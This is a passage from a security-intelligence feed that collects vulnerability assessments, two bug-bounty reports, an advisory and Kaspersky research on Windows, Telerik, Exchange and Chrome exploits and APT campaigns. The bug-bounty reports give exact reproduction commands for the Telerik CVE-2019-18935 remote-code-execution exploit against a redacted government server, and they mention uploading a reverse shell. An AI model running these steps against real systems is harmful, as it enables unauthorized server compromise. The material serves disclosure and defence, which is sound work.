PowerShell endpoint + user who belongs to specific Exchange groups = less opportunity for wide-scale attacks than something like February\u2019s Exchange vuln. I\u2019m interested to see how [Steven Seeley\u2019s exploit](<https://twitter.com/steventseeley/status/1303454166820556800>) works if he releases it, though. 
Might be cause for quick re-evaluation.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 4\n", "modified": "2021-01-15T00:00:00", "published": "2020-09-11T00:00:00", "id": "AKB:90047E82-FDD8-47DB-9552-50D104A34230", "href": "https://attackerkb.com/topics/Y2azzfAbid/cve-2020-16875", "type": "attackerkb", "title": "CVE-2020-16875", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-11-18T06:36:55", "bulletinFamily": "info", "cvelist": ["CVE-2019-13720", "CVE-2019-1458"], "description": "An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory, aka \u2018Win32k Elevation of Privilege Vulnerability\u2019.\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at October 19, 2020 5:31pm UTC reported:\n\nKnown as WizardOpium for its use in the WizardOpium attacks, and first written about by Kaspersky Labs. The writeup by Kaspersky Labs can be found at <https://securelist.com/windows-0-day-exploit-cve-2019-1458-used-in-operation-wizardopium/95432/> which shows that this vulnerability was used in conjunction with CVE-2019-13720, which was a 0day in the Chrome browser at the time that occurred due to a race condition between two threads.\n\nIn the WizardOpium attacks, the Chrome vulnerability, aka CVE-2019-13720, was first used to gain an arbitrary read/write primitive in the Chrome render process that led to arbitrary code execution as the Chrome render (read more on this at <https://bugs.chromium.org/p/chromium/issues/detail?id=888923> if you\u2019re interested). However this still left attackers with a problem: they needed some way to escape the Chrome render\u2019s sandbox if they wanted to get persistent access to the target.\n\nThis is where CVE-2019-1458 came in. 
Looking at the advisory at <https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1458> we can see this vulnerability affected quite a wide range of targets, going all the way from Windows 7 up to Windows 10 v1607. Later versions of Windows 10 are not affected, however.\n\nIf one dives around the internet a little bit more though they will stumble across <https://googleprojectzero.blogspot.com/p/rca-cve-2019-1458.html> which was written by the Project Zero team at Google which explains the vulnerability quite well. In essence there is an Uninitialized Variable error in Windows within its Windows Switching code whereby the field `*(gpsi + 0x154)` in the global structure `tagSERVERINFO`, which describes system windows (such as menus, desktops, switch windows, etc), which was not properly initialized at the start of a function, which allowed user mode code to set extra window data in a task switch window of Window class `FNID_SWITCH`, or `0x280`, which can normally only be set by the kernel. Even worse though is the fact that this extra window data is essentially a pointer which is then dereferenced and then written to, which grants the attacker a limited arbitrary write primitive in kernel mode, which they can then use to perform limited controlled writes to kernel memory and take over the system. Attackers then used this limited kernel write primitive to overwrite their current process\u2019s access token value with the value of the SYSTEM process\u2019s access token value, thereby allowing them to execute code as SYSTEM.\n\nIf one then looks at <https://github.com/piotrflorczyk/cve-2019-1458_POC>, which does a deep technical dive into all of the details of this vulnerability, one can see that the affected function was `InitFunctionTables()` within `win32k.sys`, which didn\u2019t appropriately initialize the fields `*(gpsi+0x14E)`, `*(gpsi+0x154)`, and `*(gpsi+0x180)`, despite initializing other fields within the same structure. 
Microsoft\u2019s patch ensured that these fields were all set up and initialized with appropriate values at the start of the `InitFunctionTables()` call, thus preventing this issue from occurring.\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 3\n", "modified": "2020-07-24T00:00:00", "published": "2019-12-10T00:00:00", "id": "AKB:C5336A4C-EEE0-4EA3-AD28-85F0EF3F0F75", "href": "https://attackerkb.com/topics/2i67dR7P4e/cve-2019-1458", "type": "attackerkb", "title": "CVE-2019-1458", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-29T00:32:41", "bulletinFamily": "info", "cvelist": ["CVE-2020-0688", "CVE-2020-16898", "CVE-2020-16951", "CVE-2020-16952"], "description": "A remote code execution vulnerability exists in Microsoft SharePoint when the software fails to check the source markup of an application package, aka \u2018Microsoft SharePoint Remote Code Execution Vulnerability\u2019. This CVE ID is unique from CVE-2020-16951.\n\n \n**Recent assessments:** \n \n**wvu-r7** at October 13, 2020 7:56pm UTC reported:\n\nPlease see the [Rapid7 analysis](<https://attackerkb.com/topics/4yGC4tLK2x/cve-2020-16952#rapid7-analysis>). A [Metasploit module](<https://github.com/rapid7/metasploit-framework/pull/14265>) will be released.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 4**ccondon-r7** at October 16, 2020 7:04pm UTC reported:\n\nPlease see the [Rapid7 analysis](<https://attackerkb.com/topics/4yGC4tLK2x/cve-2020-16952#rapid7-analysis>). 
A [Metasploit module](<https://github.com/rapid7/metasploit-framework/pull/14265>) will be released.\n", "modified": "2020-10-22T00:00:00", "published": "2020-10-16T00:00:00", "id": "AKB:E6BD4207-BAC0-40E1-A4C8-92B6D3D58D4B", "href": "https://attackerkb.com/topics/4yGC4tLK2x/cve-2020-16952-microsoft-sharepoint-remote-code-execution-vulnerabilities", "type": "attackerkb", "title": "CVE-2020-16952 \u2014 Microsoft SharePoint Remote Code Execution Vulnerabilities", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-11-22T06:10:03", "bulletinFamily": "info", "cvelist": ["CVE-2019-13720", "CVE-2019-1458"], "description": "Multiple vulnerabilities have been discovered in Google Chrome, the most severe of which could allow for arbitrary code execution. Google Chrome is a web browser used to access the Internet. Successful exploitation of the most severe vulnerabilities could allow an attacker to execute arbitrary code in the context of the browser. Depending on the privileges associated with the application, an attacker could install programs; view, change, or delete data; or create new accounts with full user rights. 
If this application has been configured to have fewer user rights on the system, exploitation of the most severe of these vulnerabilities could have less impact than if it was configured with administrative rights.\n\nUse after free in WebAudio in Google Chrome prior to 78.0.3904.87 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.\n\n \n**Recent assessments:** \n \n**busterb** at November 01, 2019 6:45pm UTC reported:\n\nBased on the technical analysis by Kaspersky, this is a very effective exploit, and is able to leverage an info leak, heap grooming, and the malware deployed via watering-hole injection on a Korean-language news portal, establishes persistence via a dropped file on disk.\n\nAn attacker does need to leverage a few items in advance for this and any client-side attack, that is a watering hole injection or some other delivery method. Chrome\u2019s quick patching mechanism means these vulns _typically_ have a short shelf life, though the inability to force users to actually update is a limiting factor.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 2**space-r7** at November 01, 2019 7:32pm UTC reported:\n\nBased on the technical analysis by Kaspersky, this is a very effective exploit, and is able to leverage an info leak, heap grooming, and the malware deployed via watering-hole injection on a Korean-language news portal, establishes persistence via a dropped file on disk.\n\nAn attacker does need to leverage a few items in advance for this and any client-side attack, that is a watering hole injection or some other delivery method. 
Chrome\u2019s quick patching mechanism means these vulns _typically_ have a short shelf life, though the inability to force users to actually update is a limiting factor.\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 2**gwillcox-r7** at November 22, 2020 2:51am UTC reported:\n\nBased on the technical analysis by Kaspersky, this is a very effective exploit, and is able to leverage an info leak, heap grooming, and the malware deployed via watering-hole injection on a Korean-language news portal, establishes persistence via a dropped file on disk.\n\nAn attacker does need to leverage a few items in advance for this and any client-side attack, that is a watering hole injection or some other delivery method. Chrome\u2019s quick patching mechanism means these vulns _typically_ have a short shelf life, though the inability to force users to actually update is a limiting factor.\n", "modified": "2020-10-13T00:00:00", "published": "2019-10-10T00:00:00", "id": "AKB:3609E46B-E023-474D-B14A-026E01AF8EA9", "href": "https://attackerkb.com/topics/EfbjmUx1X2/chrome-0-day-exploit-cve-2019-13720-used-in-operation-wizardopium", "type": "attackerkb", "title": "Chrome 0-day exploit CVE-2019-13720 used in Operation WizardOpium", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-15T21:10:34", "bulletinFamily": "info", "cvelist": ["CVE-2020-0688", "CVE-2020-16875", "CVE-2020-17117", "CVE-2020-17132", "CVE-2020-17141", "CVE-2020-17142", "CVE-2020-17144"], "description": "Aka \u2018Microsoft Exchange Remote Code Execution Vulnerability\u2019. This CVE ID is unique from CVE-2020-17117, CVE-2020-17141, CVE-2020-17142, CVE-2020-17144.\n\n \n**Recent assessments:** \n \n**zeroSteiner** at January 12, 2021 7:07pm UTC reported:\n\nThis vulnerability is a bypass for the patch issued for [CVE-2020-16875](<https://attackerkb.com/topics/Y2azzfAbid/cve-2020-16875>). The vulnerability was also identified and analyzed by Steven Seeley. 
The patch can be bypassed using call operators as described in Seeley\u2019s blog [Making Clouds Rain RCE in Office 365](<https://srcincite.io/blog/2021/01/12/making-clouds-rain-rce-in-office-365.html>).\n\nThe original vulnerability is a command injection vulnerability that results in OS commands being executed with SYSTEM level privileges on the Exchange server due to insufficient sanitization on a cmdlet invocation.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 4\n", "modified": "2021-01-15T00:00:00", "published": "2020-12-10T00:00:00", "id": "AKB:67DD67D3-33BC-455C-98A3-7DD0E1D4613D", "href": "https://attackerkb.com/topics/sfBIO5A6Cl/cve-2020-17132", "type": "attackerkb", "title": "CVE-2020-17132", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "hackerone": [{"lastseen": "2020-08-13T18:53:44", "bulletinFamily": "bugbounty", "bounty": 0.0, "cvelist": ["CVE-2017-11317", "CVE-2019-18935"], "description": "**Summary:**\nThe website at https://\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588/apps/XTRAHome/Telerik.Web.UI.WebResource.axd?type=rau is vulnerable to CVE-2017-11317 and CVE-2019-18935, allowing an attacker to upload arbitrary files and gain remote code execution on the underlying system.\n\n## Step-by-step Reproduction Instructions\n\n1. Browse to https://\u2588\u2588\u2588\u2588\u2588/apps/XTRAHome/Telerik.Web.UI.WebResource.axd?type=rau. You will see the following message confirming that the file upload handler is registered:\n`{ \"message\" : \"RadAsyncUpload handler is registered succesfully, however, it may not be accessed directly.\" }`\n2. From here on out I used the write-up at https://labs.bishopfox.com/tech-blog/cve-2019-18935-remote-code-execution-in-telerik-ui for reference.\n3. 
With a slight modification to the script in the BishopFox write-up, I was able to determine the software version:\n\n```\necho 'test' > testfile.txt\nfor VERSION in $(cat versions.txt); do\n echo -n \"$VERSION: \"\n python3 RAU_crypto.py -P 'C:\\Windows\\Temp' \"$VERSION\" testfile.txt https://\u2588\u2588\u2588\u2588\u2588/apps/XTRAHome/Telerik.Web.UI.WebResource.axd?type=rau 2>/dev/null | grep fileInfo || echo\n done\n```\nThe `versions.txt` file I used has been attached to this report for ease of replication.\n4. As shown in the results, the version is vulnerable to CVE-2017-11317 and I was able to successfully upload the `testfile.txt`.\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n5. Next, on a Windows system with Visual Studio installed, compile a dll using `build_dll.bat` as shown in the BishopFox article.\n6. Using `python3 CVE-2019-18935.py -u https://\u2588\u2588\u2588\u2588/apps/XTRAHome/Telerik.Web.UI.WebResource.axd?type=rau -v 2016.2.607 -f 'C:\\Windows\\Temp' -p <your_created_dll>.dll`, if you compiled using the PoC in the article you should be able to make the server hang for around 10 seconds. \n7. Once the sleep is over, the server should respond with a similar message as follows: `[*] Response time: 12.34 seconds` showing the server is vulnerable to CVE-2019-18935.\n8. 
At this point you can upload a reverse shell payload, but I feel the sleep PoC is good enough to prove RCE.\n\n## Product, Version, and Configuration (If applicable)\nTelerik UI 2016.2.607\n\n## References\nhttps://labs.bishopfox.com/tech-blog/cve-2019-18935-remote-code-execution-in-telerik-ui\nhttps://github.com/bao7uo/RAU_crypto\nhttps://github.com/noperator/CVE-2019-18935\nhttps://hackerone.com/reports/838196\n\n## Suggested Mitigation/Remediation Actions\nFollow recommended fix actions at https://www.telerik.com/support/kb/aspnet-ajax/details/allows-javascriptserializer-deserialization\n\n## Impact\n\nRemote Code Execution/Total system compromise.", "modified": "2020-08-13T18:11:22", "published": "2020-07-02T08:13:07", "id": "H1:913695", "href": "https://hackerone.com/reports/913695", "type": "hackerone", "title": "U.S. Dept Of Defense: Remote Code Execution via CVE-2019-18935", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-05-07T17:56:52", "bulletinFamily": "bugbounty", "bounty": 0.0, "cvelist": ["CVE-2017-11317", "CVE-2019-18935"], "description": "Hello,\nI found an outdated version of Telerik Web UI (v2016.2.607.40) at the following URL: https://\u2588\u2588\u2588/Telerik.Web.UI.WebResource.axd?type=rau.\nThis means that we can achieve full RCE by chaining two different CVEs: CVE-2017-11317, which allows us to upload arbitrary files on the server, and CVE-2019-18935, which is a deserialization vulnerability.\n\nFirst of all, the only thing that I tried to prove that I had successfully achieved code execution was making the server sleep for 10 seconds.\nNo data was compromised.\n\nSteps to reproduce\n---------------------\nThe steps that I followed are thoroughly described in this blog post: <https://know.bishopfox.com/research/cve-2019-18935-remote-code-execution-in-telerik-ui>.\nHere's a quick summary:\n- Download the files in the attachments\n- Make sure you have pycryptodome installed (pip3 install pycryptodome)\n- 
Run the following command: `python3 CVE-2019-18935.py -u https://\u2588\u2588\u2588\u2588\u2588/Telerik.Web.UI.WebResource.axd?type=rau -v 2016.2.607.40 -f 'C:\\Windows\\Temp' -p sleep_042020163752,45_amd64.dll`\n- The `sleep_042020160430,40_amd64.dll` is supposed to Sleep(10). This will make the server hang for roughly ten seconds, and after that you will get a response like this one: `[*] Response time: 12.88 seconds`\n- The exploit worked.\n\nThings to note\n---------------------\nI had to edit the original exploit code provided in the aforementioned blog post (https://github.com/noperator/CVE-2019-18935) because I noticed that when uploading the .dll file the server added a .tmp at the end of the file name.\nThat's why the original code was failing to exploit the deserialization part.\nI added `+ '.tmp'` at the end of line 95 and after that it worked just fine.\n\nA DLL file can only work once. This means that to test the vulnerability again a new DLL has to be compiled.\nFor this reason I provided several DLLs in the attachments so you don't have to compile them (especially because a windows machine with Visual Studio installed is required).\n\nI didn't upload a reverse shell because I thought it was not a great idea, but if needed I could do it.\n\nHow to fix\n---------------------\nJust upgrade Telerik for ASP.NET AJAX to R3 2019 SP1 (v2019.3.1023) or later.\n\n## Impact\n\nFull **Remote Code Execution** on the vulnerable server.", "modified": "2020-05-07T16:54:15", "published": "2020-04-03T14:48:45", "id": "H1:838196", "href": "https://hackerone.com/reports/838196", "type": "hackerone", "title": "U.S. 
Dept Of Defense: Remote Code Execution via Insecure Deserialization in Telerik UI ", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "symantec": [{"lastseen": "2019-12-11T16:20:57", "bulletinFamily": "software", "cvelist": ["CVE-2019-1458"], "description": "### Description\n\nMicrosoft Windows is prone to a local privilege-escalation vulnerability. A local attacker can exploit this issue to execute arbitrary code in kernel mode with elevated privileges.\n\n### Technologies Affected\n\n * Microsoft Windows 10 Version 1607 for 32-bit Systems \n * Microsoft Windows 10 Version 1607 for x64-based Systems \n * Microsoft Windows 10 for 32-bit Systems \n * Microsoft Windows 10 for x64-based Systems \n * Microsoft Windows 7 for 32-bit Systems SP1 \n * Microsoft Windows 7 for x64-based Systems SP1 \n * Microsoft Windows 8.1 for 32-bit Systems \n * Microsoft Windows 8.1 for x64-based Systems \n * Microsoft Windows RT 8.1 \n * Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1 \n * Microsoft Windows Server 2008 R2 for x64-based Systems SP1 \n * Microsoft Windows Server 2008 for 32-bit Systems SP2 \n * Microsoft Windows Server 2008 for Itanium-based Systems SP2 \n * Microsoft Windows Server 2008 for x64-based Systems SP2 \n * Microsoft Windows Server 2012 \n * Microsoft Windows Server 2012 R2 \n * Microsoft Windows Server 2016 \n\n### Recommendations\n\n**Permit local access for trusted individuals only. Where possible, use restricted environments and restricted shells.** \nEnsure that only trusted users have local, interactive access to affected computers.\n\nUpdates are available. 
Please see the references or vendor advisory for more information.\n", "modified": "2019-12-10T00:00:00", "published": "2019-12-10T00:00:00", "id": "SMNTC-111060", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/111060", "type": "symantec", "title": "Microsoft Windows Win32k CVE-2019-1458 Local Privilege Escalation Vulnerability", "cvss": {"score": 0.0, "vector": "NONE"}}], "securelist": [{"lastseen": "2019-12-12T11:22:50", "bulletinFamily": "blog", "cvelist": ["CVE-2019-13720", "CVE-2019-1458"], "description": "\n\nIn November 2019, Kaspersky technologies [successfully detected](<https://securelist.com/chrome-0-day-exploit-cve-2019-13720-used-in-operation-wizardopium/94866/>) a Google Chrome 0-day exploit that was used in Operation WizardOpium attacks. During our investigation, we discovered that yet another 0-day exploit was used in those attacks. The exploit for Google Chrome embeds a 0-day EoP exploit (CVE-2019-1458) that is used to gain higher privileges on the infected machine as well as escaping the Chrome process sandbox. The exploit is very similar to those developed by the prolific 0-day developer known as 'Volodya'.\n\nThe EoP exploit consists of two stages: a tiny PE loader and the actual exploit. After achieving a read/write primitive in the renderer process of the browser through vulnerable JS code, the PE exploit corrupts some pointers in memory to redirect code execution to the PE loader. This is done to bypass sandbox restrictions because the PE exploit cannot simply start a new process using native WinAPI functions.\n\nThe PE loader locates an embedded DLL file with the actual exploit and repeats the same process as the native Windows PE loader \u2013 parsing PE headers, handling imports/exports, etc. After that, a code execution is redirected to the entry point of the DLL \u2013 the DllEntryPoint function. 
The PE code then creates a new thread, which is an entry point for the exploit itself, and the main thread simply waits until it stops.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/12/06134554/windows_0day_wizardopium_01.png>)\n\n_EoP exploit used in the attack_\n\nThe PE file encapsulating this EoP exploit has the following header:\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/12/06134603/windows_0day_wizardopium_02.png>)\n\nThe compilation timestamp of Wed Jul 10 00:50:48 2019 is different from the other binaries, indicating it has been in use for some time.\n\nOur detailed analysis of the EoP exploit revealed that the vulnerability it used belongs to the win32k.sys driver and that the EoP exploit was the 0-day exploit because it works on the latest (patched) versions of Windows 7 and even on a few builds of Windows 10 (new Windows 10 builds are not affected because they implement measures that prevent the normal usage of the exploitable code).\n\nThe vulnerability itself is related to windows switching functionality (for example, the one triggered using the Alt-Tab key combination). That's why the exploit's code uses a few WinAPI calls (GetKeyState/SetKeyState) to emulate a key press operation.\n\nAt the beginning, the exploit tries to find the operating system version using ntdll.dll's RtlGetVersion call that's used to find a dozen offsets needed to set up fake kernel GDI objects in the memory. At the same time, it tries to leak a few kernel pointers using well-known techniques to leak kernel memory addresses (gSharedInfo, PEB's GdiSharedHandleTable). After that, it tries to create a special memory layout with holes in the heap using many calls to CreateAcceleratorTable/DestroyAcceleratorTable. 
Then a bunch of calls to CreateBitmap are performed, the addresses to which are leaked using a handle table array.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/12/06134611/windows_0day_wizardopium_03.png>)\n\n_Triggering exploitable code path_\n\nAfter that, a few pop-up windows are created and an undocumented syscall NtUserMessageCall is called using their window handles. In addition, it creates a special window with the class of a task switch window (#32771) and it's important to trigger an exploitable code path in the driver. At this step the exploit tries to emulate the Alt key and then using a call to SetBitmapBits it crafts a GDI object which contains a controllable pointer value that is used later in the kernel driver's code (win32k!DrawSwitchWndHilite) after the exploit issues a second undocumented call to the syscall (NtUserMessageCall). That's how it gets an arbitrary kernel read/write primitive.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/12/06134616/windows_0day_wizardopium_04.png>)\n\n_Achieving primitives needed to get arbitrary R/W_\n\nThis primitive is then used to perform privilege escalation on the target system. It's done by overwriting a token in the EPROCESS structure of the current process using the token value for an existing system driver process.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/12/06134620/windows_0day_wizardopium_05.png>)\n\n_Overwriting EPROCESS token structure_\n\nKaspersky products detect this exploit with the verdict PDM:Exploit.Win32.Generic. \nThese kinds of threats can also be detected with our Sandbox technology. This detection component is a part of our KATA and [Kaspersky Sandbox](<https://media.kaspersky.com/en/business-security/enterprise/Kaspersky-Sandbox-product-brief-en.pdf>) products. 
In this particular attack sandbox solution can analyze URL/malicious payload in isolated environment and detect the EPROCESS token manipulation.", "modified": "2019-12-10T20:00:39", "published": "2019-12-10T20:00:39", "id": "SECURELIST:4F6413DE862444B5FA0B192AF22A042D", "href": "https://securelist.com/windows-0-day-exploit-cve-2019-1458-used-in-operation-wizardopium/95432/", "type": "securelist", "title": "Windows 0-day exploit CVE-2019-1458 used in Operation WizardOpium", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-11-04T08:16:24", "bulletinFamily": "blog", "cvelist": ["CVE-2017-1182", "CVE-2019-13720", "CVE-2019-1458", "CVE-2020-0986", "CVE-2020-1380"], "description": "\n\nFor more than three years, the Global Research and Analysis Team (GReAT) at Kaspersky has been publishing quarterly summaries of advanced persistent threat (APT) activity. The summaries are based on our threat intelligence research and provide a representative snapshot of what we have published and discussed in greater detail in our private APT reports. They are designed to highlight the significant events and findings that we feel people should be aware of.\n\nThis is our latest installment, focusing on activities that we observed during Q3 2020.\n\nReaders who would like to learn more about our intelligence reports or request more information on a specific report are encouraged to contact [intelreports@kaspersky.com](<mailto:intelreports@kaspersky.com>).\n\n## The most remarkable findings\n\nWe have already partly documented the activities of DeathStalker, a unique threat group that seems to focus mainly on law firms and companies operating in the financial sector. The group's interest in gathering sensitive business information leads us to believe that DeathStalker is a group of mercenaries offering hacking-for-hire services, or acting as an information broker in financial circles. 
The activities of this threat actor first came to our attention through a PowerShell-based implant called Powersing. This quarter, we unraveled the threads of DeathStalker's LNK-based Powersing intrusion workflow. While there is nothing groundbreaking in the whole toolset, we believe defenders can gain a lot of value by understanding the underpinnings of a modern, albeit low-tech, infection chain used by a successful threat actor. DeathStalker continues to develop and use this implant, using tactics that have mostly been identical since 2018, while making greater efforts to evade detection. In August, our [public report of DeathStalker's activities](<https://securelist.com/deathstalker-mercenary-triumvirate/98177/>) summarized the three scripting language-based toolchains used by the group \u2013 Powersing, Janicab and Evilnum.\n\nFollowing our initial private report on Evilnum, we detected a new batch of implants in late June 2020, showing interesting changes in the (so far) quite static modus operandi of DeathStalker. For instance, the malware directly connects to a C2 server using an embedded IP address or domain name, as opposed to previous variants where it made use of at least two dead drop resolvers (DDRs) or web services, such as forums and code sharing platforms, to fetch the real C2 IP address or domain. Interestingly, for this campaign the attackers didn't limit themselves merely to sending spear-phishing emails but actively engaged victims through multiple emails, persuading them to open the decoy, to increase the chance of compromise. Furthermore, aside from using Python-based implants throughout the intrusion cycle, in both new and old variants, this was the first time that we had seen the actor dropping PE binaries as intermediate stages to load Evilnum, while using advanced techniques to evade and bypass security products.\n\nWe also found another intricate, low-tech implant that we attribute to DeathStalker with medium confidence. 
The delivery workflow uses a Microsoft Word document and drops a previously unknown PowerShell implant that relies on DNS over HTTPS (DoH) as a C2 channel. We dubbed this implant PowerPepper.\n\nDuring a recent investigation of a targeted campaign, we found a UEFI firmware image containing rogue components that drop previously unknown malware to disk. Our analysis showed that the revealed firmware modules were based on a known bootkit named Vector-EDK, and the dropped malware is a downloader for further components. By pivoting on unique traits of the malware, we uncovered a range of similar samples from our telemetry that have been used against diplomatic targets since 2017 and have different infection vectors. While the business logic of most is identical, we could see that some had additional features or differed in implementation. Due to this, we infer that the bulk of samples originate from a bigger framework that we have dubbed [MosaicRegressor](<https://securelist.com/mosaicregressor/98849/>). Code artefacts in some of the framework's components, and overlaps in C2 infrastructure used during the campaign, suggest that a Chinese-speaking actor is behind these attacks, possibly one that has connections to groups using the Winnti backdoor. The targets, diplomatic institutions and NGOs in Asia, Europe and Africa, all appear to be connected in some way to North Korea.\n\n## Europe\n\nSince publishing our initial report on WellMess (see our [_APT trends report Q2 2020_](<https://securelist.com/apt-trends-report-q2-2020/97937/>)), the UK National Cyber Security Centre (NCSC) has released a joint technical advisory, along with Canadian and US governments, on the most recent activity involving WellMess. Specifically, all three governments attribute the use of this malware targeting COVID-19 vaccine research to The Dukes (aka APT29 and Cozy Bear). The advisory also details two other pieces of malware, SOREFANG and WellMail, that were used during this activity. 
Given the direct public statement on attribution, new details provided in the advisory, as well as new information discovered since our initial investigation, we published our report to serve as a supplement to our previous reporting on this threat actor. While the publication of the NCSC advisory has increased general public awareness on the malware used in these recent attacks, the attribution statements made by all three governments provided no clear evidence for other researchers to pivot on for confirmation. For this reason, we are currently unable to modify our original statement; and we still assess that the WellMess activity has been conducted by a previously unknown threat actor. We will continue to monitor for new activity and adjust this statement in the future if new evidence is uncovered.\n\n## Russian-speaking activity\n\nIn summer, we uncovered a previously unknown multimodule C++ toolset used in highly targeted industrial espionage attacks dating back to 2018. So far, we have seen no similarities with known malicious activity regarding code, infrastructure or TTPs. To date, we consider this toolset and the actor behind it to be new. The malware authors named the toolset MT3, and based on this abbreviation we have named the toolset [MontysThree](<https://securelist.com/montysthree-industrial-espionage/98972/>). The malware is configured to search for specific document types, including those stored on removable media. It contains natural language artefacts of correct Russian and a configuration that seeks directories that exist only in the Cyrillic version of Windows, while presenting some false flag artefacts suggesting a Chinese-speaking origin. 
The malware uses legitimate cloud services such as Google, Microsoft and Dropbox for C2 communications.\n\n## Chinese-speaking activity\n\nEarlier this year, we discovered an active and previously unknown stealthy implant dubbed Moriya in the networks of regional inter-governmental organizations in Asia and Africa. This tool was used to control public facing servers in those organizations by establishing a covert channel with a C2 server and passing shell commands and their outputs to the C2. This capability is facilitated using a Windows kernel mode driver. Use of the tool is part of an ongoing campaign that we have named TunnelSnake. The rootkit was detected on the targeted machines in May, with activity dating back as early as November 2019, persisting in networks for several months following the initial infection. We found another tool showing significant code overlaps with this rootkit, suggesting that the developers have been active since at least 2018. Since neither rootkit nor other lateral movement tools that accompanied it during the campaign relied on hard-coded C2 servers, we could gain only partial visibility into the attacker's infrastructure. That said, the bulk of detected tools, apart from Moriya, consisted of both proprietary and well-known pieces of malware that were previously used by Chinese-speaking threat actors, giving a clue to the attacker's origin.\n\nPlugX continues to be effectively and heavily used across Southeast and East Asia, and also Africa, with some minimal use in Europe. The PlugX codebase has been in use by multiple Chinese-speaking APT groups, including HoneyMyte, Cycldek and LuckyMouse. Government agencies, NGOs and IT service organizations seem to be consistent targets. 
While the new USB spreading capability is opportunistically pushing the malware throughout networks, compromised MSSPs/IT service organizations appear to be a potential vector of targeted delivery, with CobaltStrike installer packages pushed to multiple systems for initial PlugX installation. Based on our visibility, the majority of activity in the last quarter appears to be in Mongolia, Vietnam and Myanmar. The number of systems in these countries dealing with PlugX in 2020 is at the very least in the thousands.\n\nWe discovered an ongoing campaign, dating back to May, utilizing a new version of the Okrum backdoor, attributed to Ke3chang. This updated version of Okrum uses an Authenticode-signed Windows Defender binary using a unique side-loading technique. The attackers used steganography to conceal the main payload in the Defender executable while keeping its digital signature valid, reducing the chance of detection. We haven't previously seen this method being used in the wild for malicious purposes. We have observed one affected victim, a telecoms company located in Europe.\n\nOn September 16, the [US Department of Justice released three indictments associated with hackers allegedly connected with APT41](<https://www.justice.gov/opa/pr/seven-international-cyber-defendants-including-apt41-actors-charged-connection-computer>) and other intrusion sets tracked as Barium, Winnti, Wicked Panda and Wicked Spider. In addition, two Malaysian nationals were also arrested on September 14, in Sitiawan (Malaysia), for "conspiring to profit from computer intrusions targeting the video game industry", following cooperation between the US DoJ and the Malaysian government, including the Attorney General's Chambers of Malaysia and the Royal Malaysia Police. The first indictment alleges that the defendants set up an elite "white hat" network security company, called Chengdu 404 Network Technology Co, Ltd. 
(aka Chengdu Si Lingsi Network Technology Co., Ltd.), and under its guise, engaged in computer intrusions targeting hundreds of companies around the world. According to the indictment, they "carried out their hacking using specialized malware, such as malware that cyber-security experts named 'PlugX/Fast', 'Winnti/Pasteboy', 'Shadowpad', 'Barlaiy/Poison Plug' and 'Crosswalk/ProxIP'". The indictments contain several indirect IoCs, which allowed us to connect these intrusions to Operation ShadowPad and Operation ShadowHammer, two massive supply-chain attacks discovered and investigated by Kaspersky in recent years.\n\n## Middle East\n\nIn June, we observed new activity by the MuddyWater APT group, involving use of a new set of tools that constitute a multistage framework for loading malware modules. Some components of the framework leverage code to communicate with C2s identical to code we observed in the MoriAgent malware earlier this year. For this reason, we decided to dub the new framework MementoMori. The purpose of the new framework is to facilitate execution of further in-memory PowerShell or DLL modules. We detected high-profile victims based in Turkey, Egypt and Azerbaijan.\n\n## Southeast Asia and Korean Peninsula\n\nIn May, we found new samples belonging to the Dtrack family. The first sample, named Valefor, is an updated version of the Dtrack RAT containing a new feature enabling the attacker to execute more types of payload. The second sample is a keylogger called Camio which is an updated version of its keylogger. This new version updates the logged information and its storage mechanism. We observed signs indicating that these malware programs were tailored for specific victims. At the time of our research our telemetry revealed victims located in Japan.\n\nWe have been tracking LODEINFO, fileless malware used in targeted attacks since last December. During this time, we observed several versions as the authors were developing the malware. 
In May, we detected version v0.3.6 targeting diplomatic organizations located in Japan. Shortly after that, we detected v0.3.8 as well. Our investigation revealed how the attackers operate during the lateral movement stage: after obtaining the desired data, the attackers wipe their traces. Our private report included a technical analysis of the LODEINFO malware and the attack sequence in the victim's network, to disclose the actor's tactics and methods.\n\nWhile tracking Transparent Tribe activity, we discovered an interesting tool used by this APT threat actor: the server component used to manage CrimsonRAT bots. We found different versions of this software, allowing us to look at the malware from the perspective of the attackers. It shows that the main purpose of this tool is file stealing, given its functionalities for exploring the remote file system and collecting files using specific filters. Transparent Tribe (aka PROJECTM and MYTHIC LEOPARD) is a very prolific APT group that has increased its activities in recent months. We reported [the launch of a new wide-ranging campaign that uses the CrimsonRAT tool](<https://securelist.com/transparent-tribe-part-1/98127/>) where we were able to set up and analyze the server 